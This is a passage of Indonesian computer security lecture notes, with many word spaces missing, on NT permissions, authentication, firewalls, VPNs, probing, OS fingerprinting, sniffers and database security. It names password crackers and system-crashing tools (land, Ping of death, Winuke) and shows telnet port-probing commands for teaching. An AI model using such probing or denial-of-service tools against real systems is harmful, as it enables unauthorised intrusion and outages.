Model keamanan user level : account user akan mendapatkan akses untuk pemakaian
bersamadenganmenciptakanshareatasdirectoryatauprinter.
o Keunggulan : kemampuan untuk memberikan user tertentu akses ke sumberdaya
yangdisharedanmenentukanjenisaksesapayangdiberikan.
o Kelemahan : proses setup yang kompleks karena administrator harus memberitahu
setiap user dan menjaga policy system keamanan tetap dapat dibawah kendalinya
denganbaik.
Model keamanan Share level : dikaitkan dengan jaringan peer to peer, dimana user
manapun membagi sumber daya dan memutuskan apakaha diperlukan password untuk
suatuaksestertentu.
o Keuntungan : kesederhanaannya yang membuat keamanan sharelevel tidak
membutuhkanaccountuseruntukmendapatkanakses.
o Kelemahan : sekali izin akses / password diberikan, tidak ada kendali atas siap yang
menaksessumberdaya.

CaraNTmenanganikeamananjaringan:

1. Memberikanpermission:
PermissionNTFSlocal
Permissionshere
2. KeamananRAS(RemoteAccessServer)
Melakukanremoteaccessusermenggunakandialup:
Otentikasiusernamedanpasswordyangvaliddengandialinpermission.
Callbacksecurity:pengecekannomorteleponyangvalid.
Auditing : menggunakan auditing trails untuk melacak ke/dari siapa, kapan
usermemilikiakseskeserverdansumberdayaapayangdiakses.
3. PengamananLayananinternet:
FirewallterbataspadaInternetInformationserver(IIS).
MenginstaltambahanproxysepertiMicrosoftProxyserver.
4. Share administrative :memungkin administrator mendapatkan akses ke server
windowsNTatauworkstationmelaluijaringan

6.Keamananpadaprinter

Dilakukandenganmensettingpropertiesprinter:
1. Menentukanpermission:fullcontrol,Managedocument,print
2. BiasanyasusunanpermissionpadaNTdefaulut:
Adminstratorfullcontrol
Hal:28
KeamananKomputer
OwnerManagedocument
Semuauserprint
3. Mengontrolprintjob,terdiridari:
Settingwaktucetak
Prioritas
Notifikasi(orangyangperludiberiperingatan)
4. Setauditinginformation

7.KeamananRegistry

Toolsyangdisediakandalampengaksesanregistry:
System policy editor : mengontrol akses terhadap registry editor, memungkinkan
administrator mengedit dan memodifikasi value tertentu dalam registry dengan berbasis
grafis.
Registry editor (regedit32.exe) : tools untuk melakukan edit dan modifikasi value dalam
registry.
Windows NT Diagnostics (winmsd.exe) : memungkinkan user melihat setting isi registry
danvaluenyatanpaharusmasukkeregistryeditorsendiri.

Toolsbackupuntukregistryyaitu:
Regback.exememanfaatkancommandline/remotesessionuntukmembackuprregistry.
ntbackup.exe:otomatisasibackupHANYApadaTapedrive,termasuksebuahkopidarifile
backupregistrylocal.
EmergencyRepairDisk(rdisk.exe):membackuphivesystemdansoftwaredalamregistry.

8.AuditdanPencatatanLog

Pencatatanlogondanlogofftermasukpencatatandalammultientrylogin
Objectaccess(pencatatanaksesobyekdanfile)
PrivilegeUse(paencatatanpemakaianhakuser)
AccountManagement(manajemenuserdangroup)
Policychange(Pencatatanperubahankebijakankeamanan)
Systemevent(pencatatanprosesrestart,shutdowndanpesansystem)
Detailedtracking(pencatatanprosesdalamsystemsecaradetail)

Hal:29
KeamananKomputer

KEAMANANJARINGAN

1.MembatasiAkseskeJaringan

A.Membuattingkatanakses:

Pembatasanpembatasan dapat dilakukan sehingga memperkecil peluang penembusan oleh

pemakaiyangtakdiotorisasi,misalnya:
Pembatasanlogin.Loginhanyadiperbolehkan:
Padaterminaltertentu.
Hanyaadawaktudanharitertentu.
Pembatasandengancallback(Logindapatdilakukansiapapun.Bilatelahsukseslogin,
sistem segera memutuskan koneksi dan memanggil nomor telepon yang telah
disepakati, Penyusup tidak dapat menghubungi lewat sembarang saluran telepon,
tapihanyapadasalurantelepontertentu).
Pembatasanjumlahusahalogin.
Logindibatasisampaitigakalidansegeradikuncidandiberitahukeadministrator.
Semualogindirekamdansistemoperasimelaporkaninformasiinformasiberikut:
Waktu,yaituwaktupemakailogin.
Terminal,yaituterminaldimanapemakailogin.
Tingkataksesyangdiizinkan(read/write/execute/all)

B.Mekanismekendaliakses:

Masalah identifikasi pemakai ketika login disebut otentifikasi pemakai (user authentication).
Kebanyakanmetodeotentifikasididasarkanpadatigacara,yaitu:
1.Sesuatuyangdiketahuipemakai,misalnya:
Password.
Kombinasikunci.
Namakecilibumertua.
Dansebagainya.

2.Sesuatuyangdimilikipemakai,misalnya:
Badge.
Kartuidentitas.
Kunci.
Dansebagainya.

3.Sesuatumengenai(ciri)pemakai,misalnya:
Sidikjari.
Sidiksuara.
Foto.
Tandatangan.

C.WaspadaterhadapRekayasasosial:

1. Mengakusebagieksekutifyangtidakberhasilmengakses,menghubungiadministrator
viatelepon/fax.
2. Mengakusebagaiadministratoryangperlumendiagnosamasalahnetwork,
menghubungienduserviaemail/fax/surat.
Hal:30
KeamananKomputer
3. Mengakusebagaipetugaskeamananecommerce,menghubungicustomeryangtelah
bertransaksiuntukmengulangkembalitransaksinyadiformyangdisediakanolehnya.
4. pencuriansurat,password.
5. penyuapan,kekerasan.

D.MembedakanSumberdayainternaldanEksternal:

Memanfaatkanteknologifirewallyangmemisahkannetworkinternaldengannetwork
eksternaldenganruletertentu.

E.SistemOtentikasiUser:

Def : adalah proses penentuan identitas dari seseorang yang sebenarnya, hal ini diperlukan
untukmenjagakeutuhan(integrity)dankeamanan(security)data,padaprosesiniseseorang
harusdibuktikansiapadirinyasebelummenggunakanlayananakses.

Upayauntuklebihmengamankanproteksipassword,antaralain:
1. Salting.
Menambahkanstringpendekkestringpasswordyangdiberikanpemakai
sehinggamencapaipanjangpasswordtertentu.
2. Onetimepassword.
Pemakaiharusmenggantipasswordsecarateratur.Upayainimembatasipeluang
passwordtelahdiketahuiataudicobacobapemakailain.
Bentukekstrimpendekataniniadalahonetimepassword,yaitupemakaimendapat
satubukuberisidaftarpassword.Setiapkalipemakailogin,pemakaimenggunakan
passwordberikutnyayangterdapatdidaftarpassword.
Denganonetimepassword,pemakaidirepotkankeharusanmenjagaagarbuku
passwordnyajangansampaidicuri.
3. Satudaftarpanjangpertanyaandanjawaban.
Variasi terhadap password adalah mengharuskan pemakai memberi satu daftar
pertanyaan panjang dan jawabannya. Pertanyaanpertanyaan dan jawabannya
dipilihpemakaisehinggapemakaimudahmengingatnyadantakperlumenuliskandi
kertas.
Pertanyaanberikutdapatdipakai,misalnya:
SiapamertuaabangiparBadru?
ApayangdiajarkanPakHarunwaktuSD?
Dijalanapapertamakaliditemukansimanis?
Pada saat login, komputer memilih salah satu dari pertanyaanpertanyaan secara
acak,menanyakankepemakaidanmemeriksajawabanyangdiberikan.
4. Tantangantanggapan(chalengeresponse).
Pemakaidiberikebebasanmemilihsuatualgoritma,misalnyax3.
Ketika pemakai login, komputer menuliskan di layar angka 3. Dalam kasus ini
pemakai mengetik angka 27. Algoritma dapat berbeda di pagi, sore, dan hari
berbeda,dariterminalberbeda,danseterusnya.

ContohProdukOtentikasiUser,antaralain:

1. SecureidACE(AccessControlEncryption)
System token hardware seperti kartu kredit berdisplay, pemakai akan menginput
nomor pin yang diketahui bersama, lalu memasukkan pascode bahwa dia pemilik
token.

2. S/key(Bellcore)
Hal:31
KeamananKomputer
System software yang membentuk one time password (OTP) berdasarkan informasi
loginterkhirdenganaturanrandomtertentu.

3. PasswordAuthenticationProtocol(PAP)
ProtokolduaarahuntukPPP(PointtopointProtocol).Peermengirimpasanganuserid
danpassword,authenticatormenyetujuinya.

4. ChallengeHandshakeAuthenticationProtocol(CHAP)
S/key pada PAP, protocol 3 arah, authenticator mengirim pesan tantangan ke peer,
peer menghitung nilai lalu mengirimkan ke authenticator, authenticator menyetujui
otentikasijikajawabannyasamadengannilaitadi.

5. RemoteAuthenticationDialinUserService(RADIUS)
Untuk hubungan dialup, menggunakan network access server, dari suatu host yang
menjadiclientRADIUS,merupansystemsatutitikakses.

6. TerminalAccessControllerAccessControlSystem(TACACS)
Protokol keamanan berbasis server dari CISCO System. Secury\ity Server terpusat
dangan file password UNIX, database otentikasi, otorisasi dan akunting, fungsi digest
(transmisipasswordyangtidakpolos)

2.MelindungiAsetOrganisasi

A.SecaraAdminsistratif/fisik
Rencanakemungkinanterhadapbencana
Programpenyaringancalonpegawaisysteminformasi
Programpelatihanuser
Kebijakanaksesnetwork

B.SecaraTeknis

B.1.PenerapanFirewall

IstilahpadapenerapanFirewall
Host
Suatusistemkomputeryangterhubungpadasuatunetwork
Bastionhost
Sistemkomputeryangharusmemilikitingkatsekuritasyangtinggikarenasisteminirawan
sekali terhadap serangan hacker dan cracker, karena biasanya mesin ini diekspos ke
networkluar(Internet)danmerupakantitikkontakutamaparauserdariinternalnetwork.
PacketFiltering
Aksi dari suatu devais untuk mengatur secara selektif alur data yang melintasi suatu
network. Packet filter dapat memblok atau memperbolehkan suatu paket data yang
melintasi network tersebut sesuai dengan kebijaksanaan alur data yang digunakan
(securitypolicy).
Perimeternetwork
Suatunetworktambahanyangterdapatdiantaranetworkyangdilindungidengannetwork
eksternal,untukmenyediakanlayertambahandarisuatusistemsecurity.Perimeter
networkjugaseringdisebutdenganDMZ(DeMillitarizedZone).

Hal:32
KeamananKomputer
KeuntunganFirewall:
Firewall merupakan fokus dari segala keputusan sekuritas. Hal ini disebabkan karena
Firewallmerupakansatutitiktempatkeluarmasuknyatrafikinternetpadasuatujaringan.
Firewall dapat menerapkan suatu kebijaksanaan sekuritas. Banyak sekali serviceservice
yangdigunakandiInternet.Tidaksemuaservicetersebutamandigunakan,olehkarenanya
Firewall dapat berfungsi sebagai penjaga untuk mengawasi serviceservice mana yang
dapatdigunakanuntukmenujudanmeninggalkansuatunetwork.
Firewall dapat mencatat segala aktivitas yang berkaitan dengan alur data secara efisien.
Semua trafik yang melalui Firewall dapat diamati dan dicatat segala aktivitas yang
berkenaan dengan alur data tersebut. Dengan demikian Network Administrator dapat
segera mengetahui jika terdapat aktivitasaktivitas yang berusaha untuk menyerang
internalnetworkmereka.
Firewalldapatdigunakanuntukmembatasipengunaansumberdayainformasi.Mesinyang
menggunakan Firewall merupakan mesin yang terhubung pada beberapa network yang
berbeda,sehinggakitadapatmembatasinetworkmanasajayangdapatmengaksessuatu
serviceyangterdapatpadanetworklainnya.

KelemahanFirewall:
Firewall tidak dapat melindungi network dari serangan koneksi yang tidak melewatinya
(terdapatpintulainmenujunetworktersebut).
Firewall tidak dapat melindungi dari serangan dengan metoda baru yang belum dikenal
olehFirewall.
Firewalltidakdapatmelindungidariseranganvirus.

PilihanklasifikasidesainFirewall:

1.PacketFiltering
Sistempaketfilteringatauseringjugadisebutdenganscreeningrouteradalahrouter
yang melakukan routing paket antara internal dan eksternal network secara selektif
sesuaidengansecuritypolicyyangdigunakanpadanetworktersebut.Informasiyang
digunakanuntukmenyeleksipaketpakettersebutadalah:
IPaddressasal
IPaddresstujuan
Protocol(TCP,UDP,atauICMP)
PortTCPatauUDPasal
PortTCPatauUDPtujuan
BeberapacontohroutingpaketselektifyangdilakukanolehScreeningRouter:
Semua koneksi dari luar sistem yang menuju internal network diblokade kecuali
untukkoneksiSMTP
Memperbolehkan service email dan FTP, tetapi memblok serviceservice
berbahayasepertiTFTP,XWindow,RPCdanrservice(rlogin,rsh,rcp,danlain
lain).
Selain memiliki keuntungan tertentu di antaranya aplikasi screening router ini dapat
bersifat transparan dan implementasinya relatif lebih murah dibandingkan metode
firewall yang lain, sistem paket filtering ini memiliki beberapa kekurangan yakni :
tingkat securitynya masih rendah, masih memungkinkan adanya IP Spoofing, tidak
adascreeningpadalayerlayerdiatasnetworklayer.

2.ApplicationLevelGateway(ProxyServices)
Proxy service merupakan aplikasi spesifik atau program server yang dijalankan pada
mesin Firewall, program ini mengambil user request untuk Internet service (seperti
FTP,telnet,HTTP)danmeneruskannya(bergantungpadasecuritypolicy)kehostyang
Hal:33
KeamananKomputer
dituju. Dengan kata lain adalah proxy merupakan perantara antara internal network
denganeksternalnetwork(Internet).
Padasisiekternalhanyadikenalmesinproxytersebut,sedangkanmesinmesinyang
beradadibalikmesinproxytersebuttidakterlihat.Akibatnyasistemproxyinikurang
transparanterhadapuseryangadadidalam

Sistem Proxy ini efektif hanya jika pada konjungsi antara internal dan eksternal
network terdapat mekanisme yang tidak memperbolehkan kedua network tersebut
terlibatdalamkomunikasilangsung.
Keuntunganyangdimilikiolehsistemproxyiniadalahtingkatsekuritasnyalebihbaik
daripada screening router, deteksi paket yang dilakukan sampai pada layer aplikasi.
Sedangkan kekurangan dari sistem ini adalah perfomansinya lebih rendah daripada
screeningrouterkarenaterjadipenambahanheaderpadapaketyangdikirim,aplikasi
yangdisupportolehproxyiniterbatas,sertasisteminikurangtransparan.

Arsitekturdasarfirewall:

Arsitektur dengan dualhomed host (kadang kadang dikenal juga sebagai dual homed
gateway/DHG)

Sistem DHG menggunakan sebuah komputer dengan (paling sedikit) dua network
interface. Interface pertama dihubungkan dengan jaringan internal dan yang lainnya
dengan Internet. Dualhomed host nya sendiri berfungsi sebagai bastion host (front
terdepan,bagianterpentingdalamfirewall).

Internet
bastion
host
Arsitektur dengan dual-homed host

screenedhost(screenedhostgateway/SHG)

Pada topologi SHG, fungsi firewall dilakukan oleh sebuah screeningrouter dan bastion
host.Routerinidikonfigurasisedemikiansehinggaakanmenolaksemuatrafikkecualiyang
ditujukan ke bastion host, sedangkan pada trafik internal tidak dilakukan pembatasan.
Dengan cara ini setiap client servis pada jaringan internal dapat menggunakan fasilitas
komunikasistandarddenganInternettanpaharusmelaluiproxy.

Internet
bastion-host
router
Arsitektur dengan screened-host

Hal:34
KeamananKomputer

screenedsubnet(screenedsubnetgateway/SSG).

Firewall dengan arsitektur screenedsubnet menggunakan dua screeningrouter dan

jaringan tengah (perimeter network) antara kedua router tersebut, dimana ditempatkan
bastionhost.Kelebihansusunaniniakanterlihatpadawaktuoptimasipenempatanserver.

Internet
bastion-host
router
eksternal
Arsitektur dengan screened-subnet
router
internal
jaringan tengah

B.2.PenerapanVirtualPrivatNetwork(VPN)

DefenisiVPN

Virtual Private Network atau Jaringan Pribadi Maya sesungguhnya sama dengan Jaringan
Pribadi(PrivateNetwork/PN)padaumumnya,dimanasatujaringankomputersuatulembaga
atau perusahaan di suatu daerah atau negara terhubung dengan jaringan komputer dari satu
grup perusahaan yang sama di daerah atau negara lain. Perbedaannya hanyalah pada media
penghubung antar jaringan. Kalau pada PN, media penghubungnya masih merupakan milik
perusahaan/grupitusendiri,dalamVPN,mediapenghubungnyaadalahjaringanpublikseperti
Internet.

Dalam VPN, karena media penghubung antar jaringannya adalah jaringan publik, diperlukan
pengamanandanpembatasanpembatasan.Pengamanandiperlukanuntukmenjagaagartidak
sebarang orang dari jaringan publik dapat masuk ke jaringan pribadi. Yang dikecualikan
hanyalahorangorangyangterdaftaratauterotentifikasiterlebihdahuluyangdapatmasukke
jaringanpribadi.Pembatasandiperlukanuntukmenjagaagartidaksemuaorangatauuserdari
jaringanpribadidapatmengaksesjaringanpublik(internet).

CaramembentukVPN

1.Tunnelling

Sesuaidenganartitunnelataulorong,dalammembentuksuatuVPNinidibuatsuatutunneldi
dalam jaringan publik untuk menghubungkan antara jaringan yang satu dan jaringan lain dari
suatu grup atau perusahaan.yang ingin membangun VPN tersebut. Seluruh komunikasi data
antarjaringan pribadi akan melalui tunnel ini, sehingga orang atau user dari jaringan publik
yang tidak memiliki izin untuk masuk tidak akan mampu untuk menyadap, mengacak atau
Hal:35
KeamananKomputer
mencuridatayangmelintasitunnelini.Adabeberapametodetunellingyangumumdipakai,di
antaranya:

IPXToIPTunnelling,atau
PPPToIPTunnelling

IPX To IP tunnelling biasa digunakan dalam jaringan VPN Novell Netware. Jadi dua jaringan
Novell yang terpisah akan tetap dapat saling melakukan komunikasi data melalui jaringan
publik Internet melalui tunnel ini tanpa kuatir akan adanya gangguan pihak ke3 yang ingin
mengganggu atau mencuri data. Pada IPX To IP tunnelling, paket data dengan protokol IPX
(standar protokol Novell) akan dibungkus (encapsulated) terlebih dahulu oleh protokol IP
(standar protokol Internet) sehingga dapat melalui tunnel ini pada jaringan publik Internet.
SamahalnyauntukPPPToIPtunnelling,dimanaPPPprotokoldiencapsulatedolehIPprotokol.

Saat ini beberapa vendor hardware router seperti Cisco, Shiva, Bay Networks sudah
menambahkankemampuanVPNdenganteknologitunnellingpadahardwaremereka.

2.Firewall

Sebagaimana layaknya suatu dinding, Firewall akan bertindak sebagai pelindung atau
pembatas terhadap orangorang yang tidak berhak untuk mengakses jaringan kita. Umumnya
duajaringanyangterpisahyangmenggunakanFirewallyangsejenis,atauseorangremoteuser
yang terhubung ke jaringan dengan menggunakan software client yang terenkripsi akan
membentuk suatu VPN, meskipun media penghubung dari kedua jaringan tersebut atau
penghubung antara remote user dengan jaringan tersebut adalah jaringan publik seperti
Internet.

Suatu jaringan yang terhubung ke Internet pasti memiliki IP address (alamat Internet) khusus
untuk masingmasing komputer yang terhubung dalam jaringan tersebut. Apabila jaringan ini
tidak terlindungi oleh tunnel atau firewall, IP address tadi akan dengan mudahnya dikenali
atau dilacak oleh pihakpihak yang tidak diinginkan. Akibatnya data yang terdapat dalam
komputer yang terhubung ke jaringan tadi akan dapat dicuri atau diubah. Dengan adanya
pelindungsepertifirewall,kitabisamenyembunyikan(hide)addresstadisehinggatidakdapat
dilacakolehpihakpihakyangtidakdiinginkan.

KemampuanfirewalldalampenerapannyapadaVPN

o IP Hiding/Mapping. Kemampuan ini mengakibatkan IP address dalam jaringan dipetakan

atau ditranslasikan ke suatu IP address baru. Dengan demikian IP address dalam jaringan
tidakakandikenalidiInternet.

o Privilege Limitation. Dengan kemampuan ini kita dapat membatasi para user dalam
jaringan sesuai dengan otorisasi atau hak yang diberikan kepadanya. Misalnya, User A
hanyabolehmengakseshomepage,userBbolehmengakseshomepage,emaildannews,
sedangkanuserChanyabolehmengaksesemail.

o OutsideLimitation.Dengankemampuaninikitadapatmembatasiparauserdalamjaringan
untukhanyamengakseskealamatalamattertentudiInternetdiluardarijaringankita.

o InsideLimitation.Kadangkadangkitamasihmemperbolehkanorangluaruntukmengakses
informasiyangtersediadalamsalahsatukomputer(misalnyaWebServer)dalamjaringan
kita. Selain itu, tidak diperbolehkan, atau memang sama sekali tidak dizinkan untuk
mengaksesseluruhkomputeryangterhubungkejaringankita.

Hal:36
KeamananKomputer
o PasswordandEncryptedAuthentication.Beberapauserdiluarjaringanmemangdiizinkan
untuk masuk ke jaringan kita untuk mengakses data dan sebagainya, dengan terlebih
dahuluharusmemasukkanpasswordkhususyangsudahterenkripsi.

3.Mengamankansaluranterbuka

Protokol TCP/IP merupakan protocol dalam set standar yang terbuka dalam pengiriman data,
untuk itulah perlu dilakukan enkripsi dalam rangka penanganan keamanan data yang
diterapkanpadaprotocoltersebut,yangmeliputi:

A.KeamananPandalapisanAplikasi

SET(SecureElectronicsTransaction)
o Menentukan bagaimana transaksi mengalir antara pemakai, pedagang dan
bank.
o Menentukanfungsikeamanan:digitalsignature,hashdanenkripsi.
o ProdukdariMastercarddanVISAInternational.

SecureHTTP
o ProdukdariworkgroupIETF,diimplementasikanpadawebservermulai1995.
o Menentukan mekanisme kriptografi standar untuk mengenkripsikan
pengirimandatahttp

PrettyGoodPrivacy(PGP)
o StandarisasiRFC1991
o Membuat dan memastikan digital signature, mengenkripsi deskripsi dan
mengkompresidata.

SecureMIME(S/MIME)
o StandarisasiRFC1521
o MIME(MultipurposeInternetMailExtension)
o Menentukan cara menempelkan file untuk dikirim ke internet dengan
menggunakan metode hirarki dalm pendefenisian user remi dan sertfikat
digitalnya.

Cybercash
o StandarisasiRFC1898
o Memproses kartu kredit di internet dengan mengenkripsi dan
menandatanganitransaksisecaradigital.

B.KeamanandalamLapisanTransport

SSL(SecureSocketLayer)
o ProdukNetscape
o Protocol yang menegoisasikan hubungan yang aman antara client dan server,
denganmenggunakankuncienkripsi40bit.

C.KeamanandalamLapisanNetwork
IPsecurityProtocol:melindungiprotocolclientIPpadanetworklayer.
IPAuthenticationheader
IPEncapsulatingSecurityprotocol
SimplekeymanagementforInternetprotocol(SKIP)
Hal:37
KeamananKomputer
InternetsecurityAssociationandkeymanagementprotocol(ISAKMP)
Internetkeymanagementprotocol(IKMP)
Sumber:www.ietf.org

EVALUASIKEAMANANSISTEMINFORMASI

SEBABMASALAHKEAMANANHARUSSELALUDIMONITOR:

Ditemukannyalubangkeamanan(securityhole)yangbaru.Perangkatlunakdanperangkat
kerasbiasanyasangatkomplekssehinggatidakmungkinuntukdiujiseratuspersen.
Kadangkadangadalubangkeamananyangditimbulkanolehkecerobohanimplementasi.

Kesalahankonfigurasi.Kadangkadangkarenalalaiataualpa,konfigurasisebuahsistem
kurangbenarsehinggamenimbulkanlubangkeamanan.Misalnyamode(permissionatau
kepemilikan)dariberkasyangmenyimpanpassword(/etc/passwddisistemUNIX)secara
tidaksengajadiubahsehinggadapatdiubahatauditulisolehorangorangyangtidak
berhak.

Penambahanperangkatbaru(hardwaredan/atausoftware)yangmenyebabkan
menurunnyatingkatsecurityatauberubahnyametodauntukmengoperasikansistem.
Operatordanadministratorharusbelajarlagi.Dalammasabelajarinibanyakhalyangjauh
darisempurna,misalnyaserveratausoftwaremasihmenggunakankonfigurasiawaldari
vendor(denganpasswordyangsama).

SUMBERLUBANGKEAMANAN

1.SalahDisain(designflaw)

Umumnyajarangterjadi.Akantetapiapabilaterjadisangatsulituntukdiperbaiki.
Akibatdisainyangsalah,makabiarpundiadiimplementasikandenganbaik,kelemahan
darisistemakantetapada.
Contoh:
LemahdisainnyaalgoritmaenkripsiROT13atauCaesarcipher,dimanakarakter
digeser13hurufatau3huruf.Meskipundiimplementasikandengan
programmingyangsangatteliti,siapapunyangmengetahuialgoritmanyadapat
memecahkanenkripsitersebut.
Kesalahandisainurutannomor(sequencenumbering)daripaketTCP/IP.
Kesalahaninidapatdieksploitasisehinggatimbulmasalahyangdikenaldengan
namaIPspoofing(sebuahhostmemalsukandiriseolaholahmenjadihostlain
denganmembuatpaketpalsusetelahengamatiurutanpaketdarihostyang
hendakdiserang).

2.Implementasikurangbaik
Banyakprogramyangdiimplementasikansecaraterburuburusehinggakurangcermat
dalampengkodean.
Akibattidakadanyacekatautestingimplementasisuatuprogramyangbarudibuat.
Contoh:
Tidakmemperhatikanbatas(bound)darisebuaharraytidakdiceksehingga
terjadiyangdisebutoutofboundarrayataubufferoverflowyangdapat
dieksploitasi(misalnyaoverwritekevariableberikutnya).
Hal:38
KeamananKomputer
Kealpaanmemfilterkarakterkarakteryanganehanehyangdimasukkansebagai
inputdarisebuahprogramsehinggasangprogramdapatmengaksesberkasatau
informasiyangsemestinyatidakbolehdiakses.

3.Salahkonfigurasi
Contoh:
Berkasyangsemestinyatidakdapatdiubaholehpemakaisecaratidaksengaja
menjadiwriteable.Apabilaberkastersebutmerupakanberkasyangpenting,
sepertiberkasyangdigunakanuntukmenyimpanpassword,makaefeknyamenjadi
lubangkeamanan.Kadangkalasebuahkomputerdijualdengankonfigurasiyang
sangatlemah.
Adanyaprogramyangsecaratidaksengajadisetmenjadisetuidrootsehingga
ketikadijalankanpemakaimemilikiaksessepertisuperuser(root)yangdapat
melakukanapasaja.

4.Salahmenggunakanprogramatausistem
Contoh:
Kesalahanmenggunakanprogramyangdijalankandenganmenggunakanaccountroot
(superuser)dapatberakibatfatal.

PENGUJIKEAMANANSISTEM

Untukmemudahkanadministratordarisisteminformasimembutuhkanautomatedtools,
perangkatpembantuotomatis,yangdapatmembantumengujiataumengevaluasi
keamanansistemyangdikelola.

ContohToolsTerintegrasi:

Perangkatlunakbantu SistemOperasi
Cops UNIX
Tripwire UNIX
Satan/Saint UNIX
SBScan:localhostsecurityscanner UNIX
Ballista<http://www.secnet.com> WindowsNT
Dansebagainya(carisendiri!)

ContohToolsPengujianyangdibuatparahacker:

Tools Kegunaan
Crack programuntukmendugaataumemecahkanpassword
denganmenggunakansebuahataubeberapakamus(dictionary).
Programcrackinimelakukanbruteforcecrackingdengan
mencobamengenkripsikansebuahkatayangdiambildarikamus,
dankemudianmembandingkanhasilenkripsidenganpassword
yangingindipecahkan.
landdanlatierra sistemWindows95/NTmenjadimacet(hang,lockup).Program
inimengirimkansebuahpaketyangsudahdispoofedsehingga
seolaholahpakettersebutberasaldarimesinyangsamadengan
menggunakanportyangterbuka
Pingodeath sebuahprogram(ping)yangdapatmengcrashkanWindows
95/NTdanbeberapaversiUnix.
Winuke programuntukmemacetkansistemberbasisWindows
Hal:39
KeamananKomputer
Dansebagainya(carisendiri!)

PROBINGSERVICES

DefenisiProbing:probe(meraba)servisapasajayangtersedia.Programinijuga
dapatdigunakanolehkriminaluntukmelihatservisapasajayangtersediadisistem
yangakandiserangdanberdasarkandatadatayangdiperolehdapatmelancarkan
serangan.

ServisdiInternetumumnyadilakukandenganmenggunakanprotokolTCPatauUDP.
Setiapservisdijalankandenganmenggunakanportyangberbeda,misalnya:
o SMTP,untukmengirimdanmenerimaemail,TCP,port25
o POP3,untukmengambilemail,TCP,port110

Contohdiatashanyasebagiandariservisyangtersedia.DisystemUNIX,lihatberkas
/etc/servicesdan/etc/inetd.confuntukmelihatservisapasajayangdijalankanoleh
serverataukomputeryangbersangkutan.

Pemilihanservisapasajatergantungkepadakebutuhandantingkatkeamananyang
diinginkan.Sayangnyaseringkalisistemyangdibeliataudirakitmenjalankanbeberapa
servisutamasebagaidefault.Kadangkadangbeberapaservisharusdimatikan
karenaadakemungkinandapatdieksploitasiolehcracker.Untukituadabeberapa
programyangdapatdigunakanuntukmelakukan

UntukbeberapaservisyangberbasisTCP/IP,prosesprobedapatdilakukandengan
menggunakanprogramtelnet.Misalnyauntukmelihatapakahadaservisemail
denganmenggunakanSMTPdigunakantelnetkeport25danport110.

unix%telnettarget.host.com25
unix%telnetlocalhost110

Programpengujiprobing(pengujisemuaportotomatis):

PaketprobeuntuksistemUNIX
nmap
strobe
tcpprobe

ProbeuntuksistemWindow95/98/NT
NetLab
Cyberkit
Ogre

Programyangmemonitoradanyaprobingkesystem

Probingbiasanyameninggalkanjejakdiberkaslogdisystemanda.Denganmengamatientrydi
dalamberkaslogdapatdiketahuiadanyaprobing.Selainitu,adajugaprogramuntuk
memonitorprobesepertipaketprogramcourtney,portsentrydantcplogd.

OSFINGERPRINTING

Hal:40
KeamananKomputer
Fingerprinting:AnalisaOSsistemyangditujuaagardapatmelihatdatabasekelemahan
sistemyangdituju.

MetodeFingerprinting:
Carayangpalingkonvensional:
o Servicetelnetkeserveryangdituju,jikaservertersebutkebetulanmenyediakan
servistelnet,seringkaliadabanneryangmenunjukkannamaOSbesertaversinya.
o ServiceFTPdiport21.Denganmelakukantelnetkeporttersebutdanmemberikan
perintahSYSTandadapatmengetahuiversidariOSyangdigunakan.
o MelakukanfingerkeWebserver,denganmenggunakanprogramnetcat(nc).
Carafingerprintingyanglebihcanggihadalahdenganmenganalisaresponsistemterhadap
permintaan(request)tertentu.MisalnyadenganmenganalisanomorurutpacketTCP/IP
yangdikeluarkanolehservertersebutdapatdipersempitruangjenisdariOSyang
digunakan.AdabeberapatoolsuntukmelakukandeteksiOSiniantaralain:
o nmap
o queso

PENGGUNAANPROGRAMPENYERANG

Untukmengetahuikelemahansisteminformasiadalahdenganmenyerangdirisendiri
denganpaketpaketprogrampenyerang(attack)yangdapatdiperolehdiInternet.

Selainprogrampenyerangyangsifatnyaagresifmelumpuhkansistemyangdituju,adajuga
programpenyerangyangsifatnyamelakukanpencurianataupenyadapandata.

Untukpenyadapandata,biasanyadikenaldenganistilahsniffer.Meskipundatatidak
dicurisecarafisik(dalamartianmenjadihilang),snifferinisangatberbahayakarenadia
dapatdigunakanuntukmenyadappassworddaninformasiyangsensitif.Inimerupakan
seranganterhadapaspekprivacy.

Contohprogrampenyadap(sniffer)antaralain:
o pcapture(Unix)
o sniffit(Unix)
o tcpdump(Unix)
o WebXRay(Windows)

PENGGUNAANSISTEMPEMANTAUJARINGAN

Sistempemantaujaringan(networkmonitoring)dapatdigunakanuntukmengetahui
adanyalubangkeamaman.

Misalnyaapabilaandamemilikisebuahserveryangsemetinyahanyadapatdiaksesoleh
orangdaridalam,akantetapidaripemantaujaringandapatterlihatbahwaadayang
mencobamengaksesmelaluitempatlain.Selainitudenganpemantaujaringandapatjuga
dilihatusahausahauntukmelumpuhkansistemdenganmelaluidenialofserviceattack
(DoS)denganmengirimkanpacketyangjumlahnyaberlebihan.

NetworkmonitoringbiasanyadilakukandenganmenggunakanprotokolSNMP(Simple
NetworkManagementProtocol).

Programnetworkmonitoring/management:
Etherboy(Windows),Etherman(Unix)
Hal:41
KeamananKomputer
HPOpenview(Windows)
Packetboy(Windows),Packetman(Unix)
SNMPCollector(Windows)
Webboy(Windows)

ProgrampemantaujaringanyangtidakmenggunakanSNMP:
iplog,icmplog,updlog,yangmerupakanbagiandaripaketiploguntukmemantaupaket
IP,ICMP,UDP.
iptraf,sudahtermasukdalampaketLinuxDebiannetdiag
netwatch,sudahtermasukdalampaketLinuxDebiannetdiag
ntop,memantaujaringansepertiprogramtopyangmemantauprosesdisistemUnix
trafshow,menunjukkantrafficantarhostsdalambentuktextmode

KEAMANANDATABASE

PenyeranganDatabase
Informasisensitifyangtersimpandidalamdatabasedapatterbuka(disclosed)bagiorang
orangyangtidakdiizinkan(unauthorized).
Informasisensitifyangtersimpandidalamdatabasedapatalteredinanunacceptable
manner
Informasisensitifyangtersimpandidalamdatabasedapatinaccessiblebagiorangorang
yangdiizinkan.
theunderlyingoperatingsystemmaybeattackedmostdifficultproblem

DatabaseInferenceProblem
Maliciousattackermayinfersensitiveinformation(thatishidden)frominformationona
databasethatisdeemednotsensitive(madepublic)
Moredifficultproblem:attackermayinferinformationcombiningwhatsonthedatabase
withwhatisalreadyknown

DatabaseAggregationProblem
Bagianbagianinformasitidaksensitive,danmenjadisensitiveketikadigabungkansecara
bersamaan.
Controlsfortheaggregationproblem
o HoneywellLOCKDataViews(LDV)databasesystem;piecesofdatalabeledas
nonsensitive,aggregateslabeledassensitive
